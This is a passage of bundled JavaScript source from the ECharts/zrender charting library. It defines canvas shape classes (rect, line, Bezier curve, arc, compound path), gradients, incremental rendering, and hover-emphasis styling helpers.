vertical/horizontal line.\n */\n\nvar round = Math.round;\n\n/**\n * Sub pixel optimize line for canvas\n *\n * @param {Object} outputShape The modification will be performed on `outputShape`.\n *                 `outputShape` and `inputShape` can be the same object.\n *                 `outputShape` object can be used repeatly, because all of\n *                 the `x1`, `x2`, `y1`, `y2` will be assigned in this method.\n * @param {Object} [inputShape]\n * @param {number} [inputShape.x1]\n * @param {number} [inputShape.y1]\n * @param {number} [inputShape.x2]\n * @param {number} [inputShape.y2]\n * @param {Object} [style]\n * @param {number} [style.lineWidth] If `null`/`undefined`/`0`, do not optimize.\n */\nfunction subPixelOptimizeLine$1(outputShape, inputShape, style) {\n    if (!inputShape) {\n        return;\n    }\n\n    var x1 = inputShape.x1;\n    var x2 = inputShape.x2;\n    var y1 = inputShape.y1;\n    var y2 = inputShape.y2;\n\n    outputShape.x1 = x1;\n    outputShape.x2 = x2;\n    outputShape.y1 = y1;\n    outputShape.y2 = y2;\n\n    var lineWidth = style && style.lineWidth;\n    if (!lineWidth) {\n        return;\n    }\n\n    if (round(x1 * 2) === round(x2 * 2)) {\n        outputShape.x1 = outputShape.x2 = subPixelOptimize$1(x1, lineWidth, true);\n    }\n    if (round(y1 * 2) === round(y2 * 2)) {\n        outputShape.y1 = outputShape.y2 = subPixelOptimize$1(y1, lineWidth, true);\n    }\n}\n\n/**\n * Sub pixel optimize rect for canvas\n *\n * @param {Object} outputShape The modification will be performed on `outputShape`.\n *                 `outputShape` and `inputShape` can be the same object.\n *                 `outputShape` object can be used repeatly, because all of\n *                 the `x`, `y`, `width`, `height` will be assigned in this method.\n * @param {Object} [inputShape]\n * @param {number} [inputShape.x]\n * @param {number} [inputShape.y]\n * @param {number} [inputShape.width]\n * @param {number} [inputShape.height]\n * @param {Object} [style]\n * @param {number} [style.lineWidth] If `null`/`undefined`/`0`, do not optimize.\n */\nfunction subPixelOptimizeRect$1(outputShape, inputShape, style) {\n    if (!inputShape) {\n        return;\n    }\n\n    var originX = inputShape.x;\n    var originY = inputShape.y;\n    var originWidth = inputShape.width;\n    var originHeight = inputShape.height;\n\n    outputShape.x = originX;\n    outputShape.y = originY;\n    outputShape.width = originWidth;\n    outputShape.height = originHeight;\n\n    var lineWidth = style && style.lineWidth;\n    if (!lineWidth) {\n        return;\n    }\n\n    outputShape.x = subPixelOptimize$1(originX, lineWidth, true);\n    outputShape.y = subPixelOptimize$1(originY, lineWidth, true);\n    outputShape.width = Math.max(\n        subPixelOptimize$1(originX + originWidth, lineWidth, false) - outputShape.x,\n        originWidth === 0 ? 0 : 1\n    );\n    outputShape.height = Math.max(\n        subPixelOptimize$1(originY + originHeight, lineWidth, false) - outputShape.y,\n        originHeight === 0 ? 0 : 1\n    );\n}\n\n/**\n * Sub pixel optimize for canvas\n *\n * @param {number} position Coordinate, such as x, y\n * @param {number} lineWidth If `null`/`undefined`/`0`, do not optimize.\n * @param {boolean=} positiveOrNegative Default false (negative).\n * @return {number} Optimized position.\n */\nfunction subPixelOptimize$1(position, lineWidth, positiveOrNegative) {\n    if (!lineWidth) {\n        return position;\n    }\n    // Assure that (position + lineWidth / 2) is near integer edge,\n    // otherwise line will be fuzzy in canvas.\n    var doubledPosition = round(position * 2);\n    return (doubledPosition + round(lineWidth)) % 2 === 0\n        ? doubledPosition / 2\n        : (doubledPosition + (positiveOrNegative ? 1 : -1)) / 2;\n}\n\n/**\n * 矩形\n * @module zrender/graphic/shape/Rect\n */\n\n// Avoid create repeatly.\nvar subPixelOptimizeOutputShape = {};\n\nvar Rect = Path.extend({\n\n    type: 'rect',\n\n    shape: {\n        // 左上、右上、右下、左下角的半径依次为r1、r2、r3、r4\n        // r缩写为1         相当于 [1, 1, 1, 1]\n        // r缩写为[1]       相当于 [1, 1, 1, 1]\n        // r缩写为[1, 2]    相当于 [1, 2, 1, 2]\n        // r缩写为[1, 2, 3] 相当于 [1, 2, 3, 2]\n        r: 0,\n\n        x: 0,\n        y: 0,\n        width: 0,\n        height: 0\n    },\n\n    buildPath: function (ctx, shape) {\n        var x;\n        var y;\n        var width;\n        var height;\n\n        if (this.subPixelOptimize) {\n            subPixelOptimizeRect$1(subPixelOptimizeOutputShape, shape, this.style);\n            x = subPixelOptimizeOutputShape.x;\n            y = subPixelOptimizeOutputShape.y;\n            width = subPixelOptimizeOutputShape.width;\n            height = subPixelOptimizeOutputShape.height;\n            subPixelOptimizeOutputShape.r = shape.r;\n            shape = subPixelOptimizeOutputShape;\n        }\n        else {\n            x = shape.x;\n            y = shape.y;\n            width = shape.width;\n            height = shape.height;\n        }\n\n        if (!shape.r) {\n            ctx.rect(x, y, width, height);\n        }\n        else {\n            buildPath(ctx, shape);\n        }\n        ctx.closePath();\n        return;\n    }\n});\n\n/**\n * 直线\n * @module zrender/graphic/shape/Line\n */\n\n// Avoid create repeatly.\nvar subPixelOptimizeOutputShape$1 = {};\n\nvar Line = Path.extend({\n\n    type: 'line',\n\n    shape: {\n        // Start point\n        x1: 0,\n        y1: 0,\n        // End point\n        x2: 0,\n        y2: 0,\n\n        percent: 1\n    },\n\n    style: {\n        stroke: '#000',\n        fill: null\n    },\n\n    buildPath: function (ctx, shape) {\n        var x1;\n        var y1;\n        var x2;\n        var y2;\n\n        if (this.subPixelOptimize) {\n            subPixelOptimizeLine$1(subPixelOptimizeOutputShape$1, shape, this.style);\n            x1 = subPixelOptimizeOutputShape$1.x1;\n            y1 = subPixelOptimizeOutputShape$1.y1;\n            x2 = subPixelOptimizeOutputShape$1.x2;\n            y2 = subPixelOptimizeOutputShape$1.y2;\n        }\n        else {\n            x1 = shape.x1;\n            y1 = shape.y1;\n            x2 = shape.x2;\n            y2 = shape.y2;\n        }\n\n        var percent = shape.percent;\n\n        if (percent === 0) {\n            return;\n        }\n\n        ctx.moveTo(x1, y1);\n\n        if (percent < 1) {\n            x2 = x1 * (1 - percent) + x2 * percent;\n            y2 = y1 * (1 - percent) + y2 * percent;\n        }\n        ctx.lineTo(x2, y2);\n    },\n\n    /**\n     * Get point at percent\n     * @param  {number} percent\n     * @return {Array.<number>}\n     */\n    pointAt: function (p) {\n        var shape = this.shape;\n        return [\n            shape.x1 * (1 - p) + shape.x2 * p,\n            shape.y1 * (1 - p) + shape.y2 * p\n        ];\n    }\n});\n\n/**\n * 贝塞尔曲线\n * @module zrender/shape/BezierCurve\n */\n\nvar out = [];\n\nfunction someVectorAt(shape, t, isTangent) {\n    var cpx2 = shape.cpx2;\n    var cpy2 = shape.cpy2;\n    if (cpx2 === null || cpy2 === null) {\n        return [\n            (isTangent ? cubicDerivativeAt : cubicAt)(shape.x1, shape.cpx1, shape.cpx2, shape.x2, t),\n            (isTangent ? cubicDerivativeAt : cubicAt)(shape.y1, shape.cpy1, shape.cpy2, shape.y2, t)\n        ];\n    }\n    else {\n        return [\n            (isTangent ? quadraticDerivativeAt : quadraticAt)(shape.x1, shape.cpx1, shape.x2, t),\n            (isTangent ? quadraticDerivativeAt : quadraticAt)(shape.y1, shape.cpy1, shape.y2, t)\n        ];\n    }\n}\n\nvar BezierCurve = Path.extend({\n\n    type: 'bezier-curve',\n\n    shape: {\n        x1: 0,\n        y1: 0,\n        x2: 0,\n        y2: 0,\n        cpx1: 0,\n        cpy1: 0,\n        // cpx2: 0,\n        // cpy2: 0\n\n        // Curve show percent, for animating\n        percent: 1\n    },\n\n    style: {\n        stroke: '#000',\n        fill: null\n    },\n\n    buildPath: function (ctx, shape) {\n        var x1 = shape.x1;\n        var y1 = shape.y1;\n        var x2 = shape.x2;\n        var y2 = shape.y2;\n        var cpx1 = shape.cpx1;\n        var cpy1 = shape.cpy1;\n        var cpx2 = shape.cpx2;\n        var cpy2 = shape.cpy2;\n        var percent = shape.percent;\n        if (percent === 0) {\n            return;\n        }\n\n        ctx.moveTo(x1, y1);\n\n        if (cpx2 == null || cpy2 == null) {\n            if (percent < 1) {\n                quadraticSubdivide(\n                    x1, cpx1, x2, percent, out\n                );\n                cpx1 = out[1];\n                x2 = out[2];\n                quadraticSubdivide(\n                    y1, cpy1, y2, percent, out\n                );\n                cpy1 = out[1];\n                y2 = out[2];\n            }\n\n            ctx.quadraticCurveTo(\n                cpx1, cpy1,\n                x2, y2\n            );\n        }\n        else {\n            if (percent < 1) {\n                cubicSubdivide(\n                    x1, cpx1, cpx2, x2, percent, out\n                );\n                cpx1 = out[1];\n                cpx2 = out[2];\n                x2 = out[3];\n                cubicSubdivide(\n                    y1, cpy1, cpy2, y2, percent, out\n                );\n                cpy1 = out[1];\n                cpy2 = out[2];\n                y2 = out[3];\n            }\n            ctx.bezierCurveTo(\n                cpx1, cpy1,\n                cpx2, cpy2,\n                x2, y2\n            );\n        }\n    },\n\n    /**\n     * Get point at percent\n     * @param  {number} t\n     * @return {Array.<number>}\n     */\n    pointAt: function (t) {\n        return someVectorAt(this.shape, t, false);\n    },\n\n    /**\n     * Get tangent at percent\n     * @param  {number} t\n     * @return {Array.<number>}\n     */\n    tangentAt: function (t) {\n        var p = someVectorAt(this.shape, t, true);\n        return normalize(p, p);\n    }\n});\n\n/**\n * 圆弧\n * @module zrender/graphic/shape/Arc\n */\n\nvar Arc = Path.extend({\n\n    type: 'arc',\n\n    shape: {\n\n        cx: 0,\n\n        cy: 0,\n\n        r: 0,\n\n        startAngle: 0,\n\n        endAngle: Math.PI * 2,\n\n        clockwise: true\n    },\n\n    style: {\n\n        stroke: '#000',\n\n        fill: null\n    },\n\n    buildPath: function (ctx, shape) {\n\n        var x = shape.cx;\n        var y = shape.cy;\n        var r = Math.max(shape.r, 0);\n        var startAngle = shape.startAngle;\n        var endAngle = shape.endAngle;\n        var clockwise = shape.clockwise;\n\n        var unitX = Math.cos(startAngle);\n        var unitY = Math.sin(startAngle);\n\n        ctx.moveTo(unitX * r + x, unitY * r + y);\n        ctx.arc(x, y, r, startAngle, endAngle, !clockwise);\n    }\n});\n\n// CompoundPath to improve performance\n\nvar CompoundPath = Path.extend({\n\n    type: 'compound',\n\n    shape: {\n\n        paths: null\n    },\n\n    _updatePathDirty: function () {\n        var dirtyPath = this.__dirtyPath;\n        var paths = this.shape.paths;\n        for (var i = 0; i < paths.length; i++) {\n            // Mark as dirty if any subpath is dirty\n            dirtyPath = dirtyPath || paths[i].__dirtyPath;\n        }\n        this.__dirtyPath = dirtyPath;\n        this.__dirty = this.__dirty || dirtyPath;\n    },\n\n    beforeBrush: function () {\n        this._updatePathDirty();\n        var paths = this.shape.paths || [];\n        var scale = this.getGlobalScale();\n        // Update path scale\n        for (var i = 0; i < paths.length; i++) {\n            if (!paths[i].path) {\n                paths[i].createPathProxy();\n            }\n            paths[i].path.setScale(scale[0], scale[1], paths[i].segmentIgnoreThreshold);\n        }\n    },\n\n    buildPath: function (ctx, shape) {\n        var paths = shape.paths || [];\n        for (var i = 0; i < paths.length; i++) {\n            paths[i].buildPath(ctx, paths[i].shape, true);\n        }\n    },\n\n    afterBrush: function () {\n        var paths = this.shape.paths || [];\n        for (var i = 0; i < paths.length; i++) {\n            paths[i].__dirtyPath = false;\n        }\n    },\n\n    getBoundingRect: function () {\n        this._updatePathDirty();\n        return Path.prototype.getBoundingRect.call(this);\n    }\n});\n\n/**\n * @param {Array.<Object>} colorStops\n */\nvar Gradient = function (colorStops) {\n\n    this.colorStops = colorStops || [];\n\n};\n\nGradient.prototype = {\n\n    constructor: Gradient,\n\n    addColorStop: function (offset, color) {\n        this.colorStops.push({\n\n            offset: offset,\n\n            color: color\n        });\n    }\n\n};\n\n/**\n * x, y, x2, y2 are all percent from 0 to 1\n * @param {number} [x=0]\n * @param {number} [y=0]\n * @param {number} [x2=1]\n * @param {number} [y2=0]\n * @param {Array.<Object>} colorStops\n * @param {boolean} [globalCoord=false]\n */\nvar LinearGradient = function (x, y, x2, y2, colorStops, globalCoord) {\n    // Should do nothing more in this constructor. Because gradient can be\n    // declard by `color: {type: 'linear', colorStops: ...}`, where\n    // this constructor will not be called.\n\n    this.x = x == null ? 0 : x;\n\n    this.y = y == null ? 0 : y;\n\n    this.x2 = x2 == null ? 1 : x2;\n\n    this.y2 = y2 == null ? 0 : y2;\n\n    // Can be cloned\n    this.type = 'linear';\n\n    // If use global coord\n    this.global = globalCoord || false;\n\n    Gradient.call(this, colorStops);\n};\n\nLinearGradient.prototype = {\n\n    constructor: LinearGradient\n};\n\ninherits(LinearGradient, Gradient);\n\n/**\n * x, y, r are all percent from 0 to 1\n * @param {number} [x=0.5]\n * @param {number} [y=0.5]\n * @param {number} [r=0.5]\n * @param {Array.<Object>} [colorStops]\n * @param {boolean} [globalCoord=false]\n */\nvar RadialGradient = function (x, y, r, colorStops, globalCoord) {\n    // Should do nothing more in this constructor. Because gradient can be\n    // declard by `color: {type: 'radial', colorStops: ...}`, where\n    // this constructor will not be called.\n\n    this.x = x == null ? 0.5 : x;\n\n    this.y = y == null ? 0.5 : y;\n\n    this.r = r == null ? 0.5 : r;\n\n    // Can be cloned\n    this.type = 'radial';\n\n    // If use global coord\n    this.global = globalCoord || false;\n\n    Gradient.call(this, colorStops);\n};\n\nRadialGradient.prototype = {\n\n    constructor: RadialGradient\n};\n\ninherits(RadialGradient, Gradient);\n\n/**\n * Displayable for incremental rendering. It will be rendered in a separate layer\n * IncrementalDisplay have two main methods. `clearDisplayables` and `addDisplayables`\n * addDisplayables will render the added displayables incremetally.\n *\n * It use a not clearFlag to tell the painter don't clear the layer if it's the first element.\n */\n// TODO Style override ?\nfunction IncrementalDisplayble(opts) {\n\n    Displayable.call(this, opts);\n\n    this._displayables = [];\n\n    this._temporaryDisplayables = [];\n\n    this._cursor = 0;\n\n    this.notClear = true;\n}\n\nIncrementalDisplayble.prototype.incremental = true;\n\nIncrementalDisplayble.prototype.clearDisplaybles = function () {\n    this._displayables = [];\n    this._temporaryDisplayables = [];\n    this._cursor = 0;\n    this.dirty();\n\n    this.notClear = false;\n};\n\nIncrementalDisplayble.prototype.addDisplayable = function (displayable, notPersistent) {\n    if (notPersistent) {\n        this._temporaryDisplayables.push(displayable);\n    }\n    else {\n        this._displayables.push(displayable);\n    }\n    this.dirty();\n};\n\nIncrementalDisplayble.prototype.addDisplayables = function (displayables, notPersistent) {\n    notPersistent = notPersistent || false;\n    for (var i = 0; i < displayables.length; i++) {\n        this.addDisplayable(displayables[i], notPersistent);\n    }\n};\n\nIncrementalDisplayble.prototype.eachPendingDisplayable = function (cb) {\n    for (var i = this._cursor; i < this._displayables.length; i++) {\n        cb && cb(this._displayables[i]);\n    }\n    for (var i = 0; i < this._temporaryDisplayables.length; i++) {\n        cb && cb(this._temporaryDisplayables[i]);\n    }\n};\n\nIncrementalDisplayble.prototype.update = function () {\n    this.updateTransform();\n    for (var i = this._cursor; i < this._displayables.length; i++) {\n        var displayable = this._displayables[i];\n        // PENDING\n        displayable.parent = this;\n        displayable.update();\n        displayable.parent = null;\n    }\n    for (var i = 0; i < this._temporaryDisplayables.length; i++) {\n        var displayable = this._temporaryDisplayables[i];\n        // PENDING\n        displayable.parent = this;\n        displayable.update();\n        displayable.parent = null;\n    }\n};\n\nIncrementalDisplayble.prototype.brush = function (ctx, prevEl) {\n    // Render persistant displayables.\n    for (var i = this._cursor; i < this._displayables.length; i++) {\n        var displayable = this._displayables[i];\n        displayable.beforeBrush && displayable.beforeBrush(ctx);\n        displayable.brush(ctx, i === this._cursor ? null : this._displayables[i - 1]);\n        displayable.afterBrush && displayable.afterBrush(ctx);\n    }\n    this._cursor = i;\n    // Render temporary displayables.\n    for (var i = 0; i < this._temporaryDisplayables.length; i++) {\n        var displayable = this._temporaryDisplayables[i];\n        displayable.beforeBrush && displayable.beforeBrush(ctx);\n        displayable.brush(ctx, i === 0 ? null : this._temporaryDisplayables[i - 1]);\n        displayable.afterBrush && displayable.afterBrush(ctx);\n    }\n\n    this._temporaryDisplayables = [];\n\n    this.notClear = true;\n};\n\nvar m = [];\nIncrementalDisplayble.prototype.getBoundingRect = function () {\n    if (!this._rect) {\n        var rect = new BoundingRect(Infinity, Infinity, -Infinity, -Infinity);\n        for (var i = 0; i < this._displayables.length; i++) {\n            var displayable = this._displayables[i];\n            var childRect = displayable.getBoundingRect().clone();\n            if (displayable.needLocalTransform()) {\n                childRect.applyTransform(displayable.getLocalTransform(m));\n            }\n            rect.union(childRect);\n        }\n        this._rect = rect;\n    }\n    return this._rect;\n};\n\nIncrementalDisplayble.prototype.contain = function (x, y) {\n    var localPos = this.transformCoordToLocal(x, y);\n    var rect = this.getBoundingRect();\n\n    if (rect.contain(localPos[0], localPos[1])) {\n        for (var i = 0; i < this._displayables.length; i++) {\n            var displayable = this._displayables[i];\n            if (displayable.contain(x, y)) {\n                return true;\n            }\n        }\n    }\n    return false;\n};\n\ninherits(IncrementalDisplayble, Displayable);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar mathMax$1 = Math.max;\nvar mathMin$1 = Math.min;\n\nvar EMPTY_OBJ = {};\n\nvar Z2_EMPHASIS_LIFT = 1;\n\n// key: label model property nane, value: style property name.\nvar CACHED_LABEL_STYLE_PROPERTIES = {\n    color: 'textFill',\n    textBorderColor: 'textStroke',\n    textBorderWidth: 'textStrokeWidth'\n};\n\nvar EMPHASIS = 'emphasis';\nvar NORMAL = 'normal';\n\n// Reserve 0 as default.\nvar _highlightNextDigit = 1;\nvar _highlightKeyMap = {};\n\nvar _customShapeMap = {};\n\n\n/**\n * Extend shape with parameters\n */\nfunction extendShape(opts) {\n    return Path.extend(opts);\n}\n\n/**\n * Extend path\n */\nfunction extendPath(pathData, opts) {\n    return extendFromString(pathData, opts);\n}\n\n/**\n * Register a user defined shape.\n * The shape class can be fetched by `getShapeClass`\n * This method will overwrite the registered shapes, including\n * the registered built-in shapes, if using the same `name`.\n * The shape can be used in `custom series` and\n * `graphic component` by declaring `{type: name}`.\n *\n * @param {string} name\n * @param {Object} ShapeClass Can be generated by `extendShape`.\n */\nfunction registerShape(name, ShapeClass) {\n    _customShapeMap[name] = ShapeClass;\n}\n\n/**\n * Find shape class registered by `registerShape`. Usually used in\n * fetching user defined shape.\n *\n * [Caution]:\n * (1) This method **MUST NOT be used inside echarts !!!**, unless it is prepared\n * to use user registered shapes.\n * Because the built-in shape (see `getBuiltInShape`) will be registered by\n * `registerShape` by default. That enables users to get both built-in\n * shapes as well as the shapes belonging to themsleves. But users can overwrite\n * the built-in shapes by using names like 'circle', 'rect' via calling\n * `registerShape`. So the echarts inner featrues should not fetch shapes from here\n * in case that it is overwritten by users, except that some features, like\n * `custom series`, `graphic component`, do it deliberately.\n *\n * (2) In the features like `custom series`, `graphic component`, the user input\n * `{tpye: 'xxx'}` does not only specify shapes but also specify other graphic\n * elements like `'group'`, `'text'`, `'image'` or event `'path'`. Those names\n * are reserved names, that is, if some user register a shape named `'image'`,\n * the shape will not be used. If we intending to add some more reserved names\n * in feature, that might bring break changes (disable some existing user shape\n * names). But that case probably rearly happen. So we dont make more mechanism\n * to resolve this issue here.\n *\n * @param {string} name\n * @return {Object} The shape class. If not found, return nothing.\n */\nfunction getShapeClass(name) {\n    if (_customShapeMap.hasOwnProperty(name)) {\n        return _customShapeMap[name];\n    }\n}\n\n/**\n * Create a path element from path data string\n * @param {string} pathData\n * @param {Object} opts\n * @param {module:zrender/core/BoundingRect} rect\n * @param {string} [layout=cover] 'center' or 'cover'\n */\nfunction makePath(pathData, opts, rect, layout) {\n    var path = createFromString(pathData, opts);\n    if (rect) {\n        if (layout === 'center') {\n            rect = centerGraphic(rect, path.getBoundingRect());\n        }\n        resizePath(path, rect);\n    }\n    return path;\n}\n\n/**\n * Create a image element from image url\n * @param {string} imageUrl image url\n * @param {Object} opts options\n * @param {module:zrender/core/BoundingRect} rect constrain rect\n * @param {string} [layout=cover] 'center' or 'cover'\n */\nfunction makeImage(imageUrl, rect, layout) {\n    var path = new ZImage({\n        style: {\n            image: imageUrl,\n            x: rect.x,\n            y: rect.y,\n            width: rect.width,\n            height: rect.height\n        },\n        onload: function (img) {\n            if (layout === 'center') {\n                var boundingRect = {\n                    width: img.width,\n                    height: img.height\n                };\n                path.setStyle(centerGraphic(rect, boundingRect));\n            }\n        }\n    });\n    return path;\n}\n\n/**\n * Get position of centered element in bounding box.\n *\n * @param  {Object} rect         element local bounding box\n * @param  {Object} boundingRect constraint bounding box\n * @return {Object} element position containing x, y, width, and height\n */\nfunction centerGraphic(rect, boundingRect) {\n    // Set rect to center, keep width / height ratio.\n    var aspect = boundingRect.width / boundingRect.height;\n    var width = rect.height * aspect;\n    var height;\n    if (width <= rect.width) {\n        height = rect.height;\n    }\n    else {\n        width = rect.width;\n        height = width / aspect;\n    }\n    var cx = rect.x + rect.width / 2;\n    var cy = rect.y + rect.height / 2;\n\n    return {\n        x: cx - width / 2,\n        y: cy - height / 2,\n        width: width,\n        height: height\n    };\n}\n\nvar mergePath = mergePath$1;\n\n/**\n * Resize a path to fit the rect\n * @param {module:zrender/graphic/Path} path\n * @param {Object} rect\n */\nfunction resizePath(path, rect) {\n    if (!path.applyTransform) {\n        return;\n    }\n\n    var pathRect = path.getBoundingRect();\n\n    var m = pathRect.calculateTransform(rect);\n\n    path.applyTransform(m);\n}\n\n/**\n * Sub pixel optimize line for canvas\n *\n * @param {Object} param\n * @param {Object} [param.shape]\n * @param {number} [param.shape.x1]\n * @param {number} [param.shape.y1]\n * @param {number} [param.shape.x2]\n * @param {number} [param.shape.y2]\n * @param {Object} [param.style]\n * @param {number} [param.style.lineWidth]\n * @return {Object} Modified param\n */\nfunction subPixelOptimizeLine(param) {\n    subPixelOptimizeLine$1(param.shape, param.shape, param.style);\n    return param;\n}\n\n/**\n * Sub pixel optimize rect for canvas\n *\n * @param {Object} param\n * @param {Object} [param.shape]\n * @param {number} [param.shape.x]\n * @param {number} [param.shape.y]\n * @param {number} [param.shape.width]\n * @param {number} [param.shape.height]\n * @param {Object} [param.style]\n * @param {number} [param.style.lineWidth]\n * @return {Object} Modified param\n */\nfunction subPixelOptimizeRect(param) {\n    subPixelOptimizeRect$1(param.shape, param.shape, param.style);\n    return param;\n}\n\n/**\n * Sub pixel optimize for canvas\n *\n * @param {number} position Coordinate, such as x, y\n * @param {number} lineWidth Should be nonnegative integer.\n * @param {boolean=} positiveOrNegative Default false (negative).\n * @return {number} Optimized position.\n */\nvar subPixelOptimize = subPixelOptimize$1;\n\n\nfunction hasFillOrStroke(fillOrStroke) {\n    return fillOrStroke != null && fillOrStroke !== 'none';\n}\n\n// Most lifted color are duplicated.\nvar liftedColorMap = createHashMap();\nvar liftedColorCount = 0;\n\nfunction liftColor(color) {\n    if (typeof color !== 'string') {\n        return color;\n    }\n    var liftedColor = liftedColorMap.get(color);\n    if (!liftedColor) {\n        liftedColor = lift(color, -0.1);\n        if (liftedColorCount < 10000) {\n            liftedColorMap.set(color, liftedColor);\n            liftedColorCount++;\n        }\n    }\n    return liftedColor;\n}\n\nfunction cacheElementStl(el) {\n    if (!el.__hoverStlDirty) {\n        return;\n    }\n    el.__hoverStlDirty = false;\n\n    var hoverStyle = el.__hoverStl;\n    if (!hoverStyle) {\n        el.__cachedNormalStl = el.__cachedNormalZ2 = null;\n        return;\n    }\n\n    var normalStyle = el.__cachedNormalStl = {};\n    el.__cachedNormalZ2 = el.z2;\n    var elStyle = el.style;\n\n    for (var name in hoverStyle) {\n        // See comment in `singleEnterEmphasis`.\n        if (hoverStyle[name] != null) {\n            normalStyle[name] = elStyle[name];\n        }\n    }\n\n    // Always cache fill and stroke to normalStyle for lifting color.\n    normalStyle.fill = elStyle.fill;\n    normalStyle.stroke = elStyle.stroke;\n}\n\nfunction singleEnterEmphasis(el) {\n    var hoverStl = el.__hoverStl;\n\n    if (!hoverStl || el.__highlighted) {\n        return;\n    }\n\n    var zr = el.__zr;\n\n    var useHoverLayer = el.useHoverLayer && zr && zr.painter.type === 'canvas';\n    el.__highlighted = useHoverLayer ? 'layer' : 'plain';\n\n    if (el.isGroup || (!zr && el.useHoverLayer)) {\n        return;\n    }\n\n    var elTarget = el;\n    var targetStyle = el.style;\n\n    if (useHoverLayer) {\n        elTarget = zr.addHover(el);\n        targetStyle = elTarget.style;\n    }\n\n    rollbackDefaultTextStyle(targetStyle);\n\n    if (!useHoverLayer) {\n        cacheElementStl(elTarget);\n    }\n\n    // styles can be:\n    // {\n    //    label: {\n    //        show: false,\n    //        position: 'outside',\n    //        fontSize: 18\n    //    },\n    //    emphasis: {\n    //        label: {\n    //            show: true\n    //        }\n    //    }\n    // },\n    // where properties of `emphasis` may not appear in `normal`. We previously use\n    // module:echarts/util/model#defaultEmphasis to merge `normal` to `emphasis`.\n    // But consider rich text and setOption in merge mode, it is impossible to cover\n    // all properties in merge. So we use merge mode when setting style here.\n    // But we choose the merge strategy that only properties that is not `null/undefined`.\n    // Because when making a textStyle (espacially rich text), it is not easy to distinguish\n    // `hasOwnProperty` and `null/undefined` in code, so we trade them as the same for simplicity.\n    // But this strategy brings a trouble that `null/undefined` can not be used to remove\n    // style any more in `emphasis`. Users can both set properties directly on normal and\n    // emphasis to avoid this issue, or we might support `'none'` for this case if required.\n    targetStyle.extendFrom(hoverStl);\n\n    setDefaultHoverFillStroke(targetStyle, hoverStl, 'fill');\n    setDefaultHoverFillStroke(targetStyle, hoverStl, 'stroke');\n\n    applyDefaultTextStyle(targetStyle);\n\n    if (!useHoverLayer) {\n        el.dirty(false);\n        el.z2 += Z2_EMPHASIS_LIFT;\n    }\n}\n\nfunction setDefaultHoverFillStroke(targetStyle, hoverStyle, prop) {\n    if (!hasFillOrStroke(hoverStyle[prop]) && hasFillOrStroke(targetStyle[prop])) {\n        targetStyle[prop] = liftColor(targetStyle[prop]);\n    }\n}\n\nfunction singleEnterNormal(el) {\n    var highlighted = el.__highlighted;\n\n    if (!highlighted) {\n        return;\n    }\n\n    el.__highlighted = false;\n\n    if (el.isGroup) {\n        return;\n    }\n\n    if (highlighted === 'layer') {\n        el.__zr && el.__zr.removeHover(el);\n    }\n    else {\n        var style = el.style;\n\n        var normalStl = el.__cachedNormalStl;\n        if (normalStl) {\n            rollbackDefaultTextStyle(style);\n            el.setStyle(normalStl);\n            applyDefaultTextStyle(style);\n        }\n        // `__cachedNormalZ2` will not be reset if calling `setElementHoverStyle`\n        // when `el` is on emphasis state. So here by comparing with 1, we try\n        // hard to make the bug case rare.\n        var normalZ2 = el.__cachedNormalZ2;\n        if (normalZ2 != null && el.z2 - normalZ2 === Z2_EMPHASIS_LIFT) {\n            el.z2 = normalZ2;\n        }\n    }\n}\n\nfunction traverseUpdate(el, updater, commonParam) {\n    // If root is group, also enter updater for `highDownOnUpdate`.\n    var fromState = NORMAL;\n    var toState = NORMAL;\n    var trigger;\n    // See the rule of `highDownOnUpdate` on `graphic.setAsHighDownDispatcher`.\n    el.__highlighted && (fromState = EMPHASIS, trigger = true);\n    updater(el, commonParam);\n    el.__highlighted && (toState = EMPHASIS, trigger = true);\n\n    el.isGroup && el.traverse(function (child) {\n        !child.isGroup && updater(child, commonParam);\n    });\n\n    trigger && el.__highDownOnUpdate && el.__highDownOnUpdate(fromState, toState);\n}\n\n/**\n * Set hover style (namely \"emphasis style\") of element, based on the current\n * style of the given `el`.\n * This method should be called after all of the normal styles have been adopted\n * to the `el`. See the reason on `setHoverStyle`.\n *\n * @param {module:zrender/Element} el Should not be `zrender/container/Group`.\n * @param {Object} [el.hoverStyle] Can be set on el or its descendants,\n *        e.g., `el.hoverStyle = ...; graphic.setHoverStyle(el); `.\n *        Often used when item group has a label element and it's hoverStyle is different.\n * @param {Object|boolean} [hoverStl] The specified hover style.\n *        If set as `false`, disable the hover style.\n *        Similarly, The `el.hoverStyle` can alse be set\n *        as `false` to disable the hover style.\n *        Otherwise, use the default hover style if not provided.\n */\nfunction setElementHoverStyle(el, hoverStl) {\n    // For performance consideration, it might be better to make the \"hover style\" only the\n    // difference properties from the \"normal style\", but not a entire copy of all styles.\n    hoverStl = el.__hoverStl = hoverStl !== false && (el.hoverStyle || hoverStl || {});\n    el.__hoverStlDirty = true;\n\n    // FIXME\n    // It is not completely right to save \"normal\"/\"emphasis\" flag on elements.\n    // It probably should be saved on `data` of series. Consider the cases:\n    // (1) A highlighted elements are moved out of the view port and re-enter\n    // again by dataZoom.\n    // (2) call `setOption` and replace elements totally when they are highlighted.\n    if (el.__highlighted) {\n        // Consider the case:\n        // The styles of a highlighted `el` is being updated. The new \"emphasis style\"\n        // should be adapted to the `el`. Notice here new \"normal styles\" should have\n        // been set outside and the cached \"normal style\" is out of date.\n        el.__cachedNormalStl = null;\n        // Do not clear `__cachedNormalZ2` here, because setting `z2` is not a constraint\n        // of this method. In most cases, `z2` is not set and hover style should be able\n        // to rollback. Of course, that would bring bug, but only in a rare case, see\n        // `doSingleLeaveHover` for details.\n        singleEnterNormal(el);\n\n        singleEnterEmphasis(el);\n    }\n}\n\nfunction onElementMouseOver(e) {\n    !shouldSilent(this, e)\n        // \"emphasis\" event highlight has higher priority than mouse highlight.\n        && !this.__highByOuter\n        && traverseUpdate(this, singleEnterEmphasis);\n}\n\nfunction onElementMouseOut(e) {\n    !shouldSilent(this, e)\n        // \"emphasis\" event highlight has higher priority than mouse highlight.\n        && !this.__highByOuter\n        && traverseUpdate(this, 